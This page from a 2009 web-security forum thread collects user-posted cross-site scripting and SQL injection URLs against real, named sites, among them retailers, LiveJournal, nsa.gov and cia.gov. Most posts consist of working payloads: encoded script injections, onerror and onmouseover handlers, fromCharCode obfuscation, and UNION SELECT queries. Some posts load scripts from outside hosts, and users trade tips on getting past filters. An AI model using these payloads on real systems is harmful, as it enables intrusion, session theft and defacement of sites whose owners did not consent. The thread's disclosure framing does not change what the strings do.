Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...5556575859606162636465Next
Current Page: 60 of 65
Re: So it begins
Posted by: one23
Date: January 05, 2009 06:45PM

@PaPPy

Gr8 job dude !!!!

Options: ReplyQuote
Re: So it begins
Posted by: t
Date: January 05, 2009 10:58PM

was playing around with url=

hxxps://blackboard.uoregon.edu/webapps/login/?new_loc=">

its neat, but i tried to escape so I could script but had no luck... is possible?

Options: ReplyQuote
Re: So it begins
Posted by: thornmaker
Date: January 06, 2009 02:40AM

yes it's possible. try an img/onerror injection with a backslash before each attribute

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: January 09, 2009 12:44AM

t Wrote:
-------------------------------------------------------
> was playing around with url=
>
> hxxps://blackboard.uoregon.edu/webapps/login/?new_
> loc=">
>
> its neat, but i tried to escape so I could script
> but had no luck... is possible?

blackboard has so many xss (persistent and reflective) vuns in it its not funny. We spent an afternoon on it one day and came back with about 20 different versions in different spots.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Spyware
Date: January 10, 2009 08:14AM

hxxp://cygwin.com/cgi-bin2/package-grep.cgi?grep=<script>alert(1)</script>

Options: ReplyQuote
Re: So it begins
Posted by: chosi
Date: January 11, 2009 05:59AM

digi7al64 Wrote:
> blackboard has so many xss (persistent and
> reflective) vuns in it its not funny. We spent an
> afternoon on it one day and came back with about
> 20 different versions in different spots.

yup. if you try three random parameters in an url. at least two of them are vulnerable. great for people new in xss: it's _bound_ to happen ;)

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: January 11, 2009 01:09PM

http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=test%22%3E%29%3B%20document.write%28String.fromCharCode%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C62%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%2C59%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3B%20//%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053

http://www.homedepot.com/webapp/wcs/stores/servlet/THDStoreFinder?storeId=10051&URL=StoreFinderViewDetails&errorViewName=StoreFinderView&headerStoreFinder=&List=List&catalogId=10053&zip=%22%3B%20document.write%28String.fromCharCode%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C62%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%2C59%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3B%20var%20blah%3D%22a%26distance_1%3D100%26city%3D%26state_1%3D%26distance_2%3D100%26store%3D

http://www.homedepot.com/webapp/wcs/stores/servlet/ContentView?storeId=10051&jspStoreDir=hdus&pn=SF_OD_Charbroil_Red_Grill_%27%29%3Bdocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,59,60,47,115,99,114,105,112,116,62));%0Adocument.write('a

https://careers.homedepot.com/cg/stores.do?city=%22></a><script>alert(1);</script>&stateAbbrev=IA&zip=&companyId=&storeNumbersHtml=&positionCodesHtml=&searchType=1&isKiosk=false

http://www.homedepot.ca/webapp/wcs/stores/servlet/CatalogSearchResultView?storeId=10051&catalogId=10051&langId=-15&N=0&Ntk=level1&Ntt=%22><img%20src=x%20onerror=%22alert(1)%22;>&Nty=1&D=%22><img%20src=x%20onerror=%22alert(1)%22;>&Ntx=mode+matchallpartial&Dx=mode+matchallpartial&s=true

http://www.expo.com/searchresults.aspx?searchterm=</title>';%20</script><script>alert(1);</script>

http://www.kmart.com/shc/s/s_10151_10104_Bed+%26+Bath_Bedding_Pillows--%3E%3Cimg%20src=x%20onerror=%22alert(1);%22%3E#viewItems=21&pageNum=1&sortOption=SALE_HIGH_TO_LOW&&filter=Brand%7CCannon%7CEssential+Home%7CJoe+Boxer%22%3E%3C/a%3Etest%7CAbbey+Hill&lastFilter=Brand?adCell=A2

i need some help with this one
http://www.homedecorators.com/search.php?search=%22%3E%2526lt%26lt%3B%2Fa%26gt%3Bmarquee%3Etest&x=0&y=0

http://www.xssed.com/archive/author=PaPPy/



Edited 7 time(s). Last edit at 01/11/2009 06:56PM by PaPPy.

Options: ReplyQuote
Re: So it begins
Posted by: chosi
Date: January 12, 2009 09:29AM

PaPPy Wrote:
-------------------------------------------------------
> ...
> i need some help with this one
> http://www.homedecorators.com/search.php?search=%2
> 2%3E%2526lt%26lt%3B%2Fa%26gt%3Bmarquee%3Etest&x=0&
> y=0


how about http://www.homedecorators.com/searchTips.php?search=%22%3E/onmouseover=alert(1)// - only an event handler though :)

Fnny: NoScript says "possible XSS filtered" but it's still alerting, when I mouseover the form. That's a bug, isn't it?! :o

Options: ReplyQuote
Re: So it begins
Posted by: zabouteurezzz
Date: January 13, 2009 02:49AM

http://ranshop.e-games.com.ph/shop/desc.asp?prod_no=142205&type=new";<script>alert('xss')</script><"

-----------------------
"PiNoY AkO!"

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: January 14, 2009 03:48PM

http://shop3.frys.com/search?search_type=regular&sqxts=1&query_string=mouse_over_here%22%20onmouseover%3D%22document.location='http%26%2358//google.com';&cat=0&submit.x=0&submit.y=0

http://www.sears.com/shc/s/v_10153_12605_Health+testicles--><iframe%20src=%22http:/%0a/google.com%22>

or different version same page but inside the JS, it took me some time to get to this solution
http://www.sears.com/shc/s/v_10153_12605_Health+testicles%22;%20document.location=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3A%5Cx2F%5Cx2F%5Cx67%5Cx6F%5Cx6F%5Cx67%5Cx6C%5Cx65%5Cx2E%5Cx63%5Cx6F%5Cx6D

click on print
http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=%27);%20alert(1);%20//&noBc=Click%20on%20print

http://www.tmz.com/search/?q=</title><script>alert(1);</script>test

http://www.xssed.com/archive/author=PaPPy/



Edited 4 time(s). Last edit at 01/14/2009 06:38PM by PaPPy.

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: January 16, 2009 06:36PM

this deserves its own post
http://www.nsa.gov/applications/ia/events/open_index.cfm?menutype=openreg%22;%20alert(1);%20var%20blah=%221
http://www.nsa.gov/applications/ia/events/conferences/index.cfm?ConferenceID=58&menutype=openreg%22;%20alert(1);%20var%20blah=%221
http://www.nsa.gov/applications/ia/events/closed_index.cfm?menutype=closedreg%22;%20alert(1);%20var%20blah=%221
http://www.nsa.gov/applications/ia/events/scheduled_index.cfm?menutype=scheduled%22;%20alert(1);%20var%20blah=%221
http://csc-webserver.caci.com/nsa/new/email_friend.asp?refer_url=%22><script>alert(1);</script>
https://www.cia.gov/search?NS-search-offset=483&NS-query=%27;%20%0A%7D%20%0A%20alert(1);%20%0A%20function%20makeGuidedSearchApplet2()%7B%0A%20str+=%27&NS-search-type=NS-boolean-query&NS-max-records=20&NS-collection=Everything&x=0&y=0&NS-search-page=results&

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 01/16/2009 06:54PM by PaPPy.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: January 26, 2009 04:57PM

Hi livejournal, both fire upon logging in.

The obvious: http://www.livejournal.com/?returnto=javascript:alert(document.domain)

The not so obvious: http://www.livejournal.com/?returnto=%0A%0D%3C!DOCTYPE%20HTML%20PUBLIC%20%22-//IETF//DTD%20HTML%202.0//EN%22%3E%3CHTML%3E%3CHEAD%3E%3CTITLE%3E%3C/TITLE%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C/HEAD%3E%3CBODY%3E%3C![

btw, ++ to livejournal for HttpOnly cookies, though!

EDIT: Regarding HttpOnly cookies, I thought about trying to set/modify them via response splitting, but I could really get it to work.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/26/2009 04:58PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: euronymous
Date: March 10, 2009 09:13AM

as always, lack of Java exception trace HTML escaping...

http://antisnatchor.com/2009/03/10/riotfamily-release-80-xss/

+++eat, fuck, hack+++

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: March 14, 2009 12:29PM

http://herhotspot.com/search/hhs/%22%27%22%3E%3Cscript%3Ealert(%22hey%20ladies!%22)%3C/script%3E

real xss. not sugar coated.

Options: ReplyQuote
Re: So it begins
Posted by: nEUrOO
Date: March 17, 2009 06:30PM

@mario: Funnier that the XSS, why did you go on that website? :)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: So it begins
Posted by: thrill
Date: March 17, 2009 06:39PM

@nEUrOO - umm.. he was doing "research"? ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: So it begins
Posted by: flam
Date: March 17, 2009 08:12PM

http://rouxbe.com/recipes/video/search
"><script>alert('XSS')</script>


I don't see what a person can do by XSSing a search :/ Does anyone care to enlighten me please?

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: March 18, 2009 01:17PM

@thrill && nEUrOO: Yep. Research. For good. Really :)

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: March 21, 2009 05:21AM

That one is actually one of those sites that has XSS literally on every page

http://herhotspot.com/node/2224/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: nEUrOO
Date: March 22, 2009 09:08PM

LivingSocial: http://iphoneapps.livingsocial.com/search?q=%3C%2Ftitle%3E%3Cbody%20onload%3Dalert(%2Fpwn%2F)%3E

Interesting that this website has tons of Facebook apps :)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: March 24, 2009 10:26AM

bored

http://www.turkishculturalfoundation.org/pages.php?ID=-31%27%20UNION%20SELECT%20@@version--%20-

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: March 25, 2009 05:21PM

thought this was for xss?

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: March 25, 2009 05:57PM

full disclosure is full disclosure, right?

but if you insist...
http://www.turkishculturalfoundation.org/pages.php?ID=-31%27%20UNION%20SELECT%20CHAR(34,39,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,88,83,83,39,41,60,47,115,99,114,105,112,116,62)--%20-

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: March 27, 2009 06:51AM

http://travel.travel/index.php/photos/?album=1&gallery=</title><script%20src=http://0x.lv></script>43

:)

Options: ReplyQuote
Re: So it begins
Posted by: lightos
Date: March 27, 2009 12:45PM

http://www.pcworld.com/shopping/detail/prtprdid,62468597-sortby,retailer/pricing.html?zip=%22%3E%3Cscript%3Ealert(0)%3C%2Fscript%3E

http://store.officedepot.com.mx/OnlineStore/BrowseBrandID.do?brand=PORTMAN&name=xss<script>alert(0)</script>



Edited 2 time(s). Last edit at 05/28/2009 07:57AM by lightos.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: March 28, 2009 01:42PM

Hell's bells

http://www.vaticanlibrary.va/home.php?pag=sc_dirett%22%3E%3Cscript%20src=http://h4k.in%3E%3C/script%3Eore

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: April 01, 2009 02:34PM

http://ratethepink.com/comments.php?poster_id=78'<iframe%20src=//google.com
maybe someone could show me some way to exploit this sql injection?

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 04/01/2009 04:26PM by PaPPy.

Options: ReplyQuote
Re: So it begins
Posted by: Spyware
Date: April 02, 2009 08:25AM

http://coderaptors.com/?<script>alert(1)</script>

They have cool Java Applets which demonstrate various sorting algorithms on this site, which almost makes up for this vulnerability. Almost.

Options: ReplyQuote
Re: So it begins
Posted by: SpoofGhost
Date: April 06, 2009 12:54PM

haha i also got a nice one

rootx.nl

ohh well u get my point xD



Edited 1 time(s). Last edit at 04/06/2009 12:55PM by SpoofGhost.

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: April 15, 2009 01:33PM

http://www.irintech.com/x1/blogarchive.php?id=480/*sql injection here*/

oh the irony

Options: ReplyQuote
Pages: PreviousFirst...5556575859606162636465Next
Current Page: 60 of 65


Sorry, only registered users may post in this forum.